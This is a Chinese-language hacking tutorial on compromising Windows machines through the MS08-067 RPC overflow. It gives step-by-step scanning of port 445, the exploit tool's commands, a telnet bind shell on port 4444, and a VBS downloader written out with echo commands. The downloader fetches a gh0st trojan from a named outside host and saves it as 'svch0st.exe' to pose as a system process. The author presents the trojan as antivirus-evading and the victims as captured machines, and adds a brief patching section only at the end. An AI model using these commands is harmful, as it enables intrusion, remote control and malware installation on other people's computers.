利用遠程溢出漏洞進行攻擊是一種非常有效而且威力巨大的黑客攻擊手段。
微軟Windows系統已經有一年多沒有爆出遠程溢出漏洞了,微軟爆出四年以來最嚴重的特大安全漏洞——MS08-067遠程溢出漏洞,幾乎影響所有Windows系統,並且很快成爲黑客攻擊和木馬傳播利用的手段,受此漏洞危害的用戶系統非常之多!
一、MS08-067遠程溢出漏洞簡介
曾經的衝擊波、震盪波等大規模攻擊都是由於Windows的RPC服務漏洞造成的,MS08-067遠程溢出漏洞也不例外。MS08-067遠程溢出漏洞的原因是由於Windows系統中RPC存在缺陷造成的,Windows系統的Server服務在處理特製RPC請求時存在緩衝區溢出漏洞,遠程攻擊者可以通過發送惡意的RPC請求觸發這個溢出,如果受影響的系統收到了特製僞造的RPC請求,可能允許遠程執行代碼,導致完全入侵用戶系統,以SYSTEM權限執行任意指令並獲取數據,並獲取對該系統的控制權,造成系統失竊及系統崩潰等嚴重問題。
受MS08-067遠程溢出漏洞影響的系統非常多,受影響的操作系統有Windows XP /2000/Vista/2003等。除Windows Server 2008 Core外,基本上所有的Windows系統都會遭受此漏洞的攻擊,特別是在Windows 2000、Windows XP和Windows Server 2003系統,攻擊者可以利用此漏洞無需通過認證運行任意代碼。這個漏洞還可能被蠕蟲利用,此安全漏洞可以通過惡意構造的網絡包直接發起攻擊,並且攻擊者可以獲取完整權限,因此該漏洞很可能會被用於製作蠕蟲以進行大規模的攻擊。
二、漏洞主機掃描
在利用MS08-067遠程溢出漏洞進行攻擊前,首先要找到要攻擊的主機目標。由於啓用了RPC服務的Windows系統往往會開放445端口,因此攻擊者只要使用專業端口掃描工具掃描445端口,即可獲取可溢出的主機列表。這裏使用的是老牌掃描工具——圖標是一個瑞士軍刀的X-Scan。
1.掃描設置
步驟1:運行X-Scan後,首先需要設置掃描的目標IP地址段。點擊工具欄上的“掃描參數”按鈕,選擇“檢測範圍”選項,在“指定IP範圍”裏可以輸入一個固定的IP地址或IP地址段。
步驟2:切換到“全局設置”→“掃描模塊”選項,設置掃描模塊爲“開放服務”。
步驟3:在“插件設置”→“端口相關設置”中,將待檢測的端口改爲“445”。
步驟4:在“全局設置”→“其它設置”中,將掃描類型設置爲“無條件掃描”。
步驟5:最後在“全局設置”→“掃描報告”中勾選“掃描完成後自動生成並顯示報告”項,設置完畢後點擊確定按鈕,關閉對話框。
步驟6:點擊工具欄上的“開始掃描”按鈕,X-scan就開始工作了。確定後,即可開始進行掃描。掃描結束後,會自動彈出一個掃描結果窗口查看到掃描結果。如果發現開放了445端口的主機,那麼這些主機只要未及時打上補丁,都很可能遭受攻擊成爲入侵者的肉雞!
三、MS08-067溢出工具溢出攻擊
現在我們可以一個一個的嘗試溢出攻擊掃描出來的目標了。首先,下載溢出攻擊工具“MS08-067遠程溢出漏洞利用工具”,並將其解壓於C盤根目錄下。點擊“開始”菜單→“運行”,輸入命令“CMD”,回車後打開命令提示符窗口。進入溢出工具所有的文件夾“Release”目錄下,執行命令“MS08-067.exe”,可看到溢出工具命令使用格式爲: MS08-067.exe <Server>,將其中的Server換爲自己要攻擊的遠程主機就可以了。
1.建立空連接
在攻擊前,首先要與目標主機建立一個空連接,這裏假設我們要攻擊的目標主機爲“192.168.1.8”,可執行如下命令:
net use //192.168.1.9//ipc$
命令執行後,即可與遠程主機建立一個空連接。
提示:
這一步不是必須的,如果有的主機無法溢出成功,可以先進行空連接。而有的主機則不必建立空連接,即可進行溢出。
2.執行遠程溢出
建立空連接後,即可進行溢出攻擊了。攻擊命令如下:
MS08-067.exe 192.168.1.9
執行攻擊命令後,溢出程序就會自動與遠程主機建立SMB連接,並進行溢出攻擊。
3.溢出返回結果
溢出攻擊後,往往會有不同的返回結果提示信息,一般有三種情況:
如果返回的信息爲:
SMB Connect OK!
Maybe Patched!
那麼說明遠程主機上可能已經打上了該溢出漏洞補丁,雖然可以建立SMB連接,但是無法攻擊成功。
如果返回信息爲:Make SMB Connection error:53或者Make SMB Connection error:1219,後面的數字可能是變化的。那麼說明該主機沒有開機連網或者沒有安裝 Microsoft 網絡的文件和打印機共享協議 或沒有啓動Server服務,因此無法進行溢出。
還有一種情況是返回信息爲:
SMB Connect OK!
RpcExceptionCode() = 1722
出現這樣的情況,溢出失敗,對方開啓了防火牆。
那麼最後就是成功的提示信息了:
SMB Connect OK!
Send Payload Over!
出現這樣的提示,說明溢出成功,成功的發送溢出模塊並綁定在了遠程主機端口上。
4.遠程登錄
現在溢出成功後就可以遠程登錄了,登錄命令很簡單:
Tlenet IP地址 4444
直接用Telnet連接遠程主機IP地址的4444端口就可以了。這裏執行了命令:
Telnet 119.1.41.97 4444
成功的連接上了遠程主機。在遠程主機上執行命令“netstat -an”時,可以看到開放了4444端口,這就是溢出打開的端口。
四、VBS腳本入侵
現在我們可以在遠程主機上任意添加管理員帳戶,或者開啓3389遠程桌面進行連接。不過最簡單的還是用木馬來進行攻擊。
1.配置木馬
首先,配置一個木馬服務端程序,這裏我選擇了“gh0st 3.6”,這個木馬可以過瑞星和卡巴斯基的主動防禦,非常強!將木馬上傳到某個空間中,然後在遠程主機上執行命令:“tasklist”,命令執行後可查看遠程主機上的所有進程。這裏我們發現遠程主機未開啓任何防火牆和殺毒軟件,而且發現對方正在玩QQ遊戲鬥地主。沒有運行殺毒軟件的話,可以直接上傳木馬,連免殺都不用。如果發現殺毒軟件進程的話,可以有針對性的進行免殺。
2.生成下載腳本
然後在遠程命令窗口中執行如下命令:
echo iLocal = LCase(WScript.Arguments(1)) >iget.vbe
echo iRemote = LCase(WScript.Arguments(0)) >>iget.vbe
echo Set xPost = CreateObject("Microsoft.XMLHTTP") >>iget.vbe
echo xPost.Open "GET",iRemote,0 >>iget.vbe
echo xPost.Send() >>iget.vbe
echo Set sGet = CreateObject("ADODB.Stream") >>iget.vbe
echo sGet.Mode = 3 >>iget.vbe
echo sGet.Type = 1 >>iget.vbe
echo sGet.Open() >>iget.vbe
echo sGet.Write(xPost.responseBody) >>iget.vbe
echo sGet.SaveToFile iLocal,2 >>iget.vbe
命令執行後,可在遠程主機當前目錄下生成一個名爲“iget.vbe”的腳本文件。
在遠程窗口中執行生成腳本和下載木馬並運行時,速度一定要快,否則如果對方關機或者出現什麼意外斷開連接時,就無法再次連接了。因爲這個漏洞只能溢出一次,而且溢出後只能連接一次。
3.下載運行木馬
生成下載腳本後,就可以用腳本下載運行木馬程序了,這裏我們上傳的木馬連接地址爲“http://xiaopuma.gicp.net:81/server.exe”,因此執行如下命令:
cscript iget.vbe http://xiaopuma.gicp.net:81/server.exe svch0st.exe
前面的“cscript”是用於執行腳本的,後面的“svch0st.exe”是下載木馬後保存的文件名。命令執行後,木馬就被下載到遠程主機上了。在命令行窗口中執行“svch0st.exe”,即可成功運行木馬程序。
用木馬客戶端連接木馬,一臺肉雞就到手啦!筆者在測試過程中,發現MS08-067遠程溢出成功率可達30%以上。一般來說,只要遠程主機上未安裝防火牆,並且同時開啓了Computer Browser、Server、Workstation這三個系統服務,並且存在此溢出漏洞,通常都可以溢出成功。
五、防範MS08-067遠程溢出
由於MS08-067遠程溢出危害非常大,因此有必要對其進行防範。但是由於前段時間的微軟“黑屏”事件讓不少用戶成了關閉了自動更新,寧可系統漏洞百出也不去打補丁,於是此漏洞在許多主機上都存在,給黑客利用MS08-067漏洞進行攻擊提供了可乘之機。其實造成盜版用戶黑屏的補丁是KB892130,這個漏洞的安全補丁編號是KB958644,我們只要安裝此補丁就可以了,也可以通過第三方工具,下載補丁包打上該補丁。
另外,將Computer Browser、Server、Workstation這三個系統服務關閉,畢竟這三個服務在大多數情況下是用不到的。同時,爲了防止以後RPC又出現什麼漏洞,最好是安裝防火牆,關閉本機的445端口。15:29:41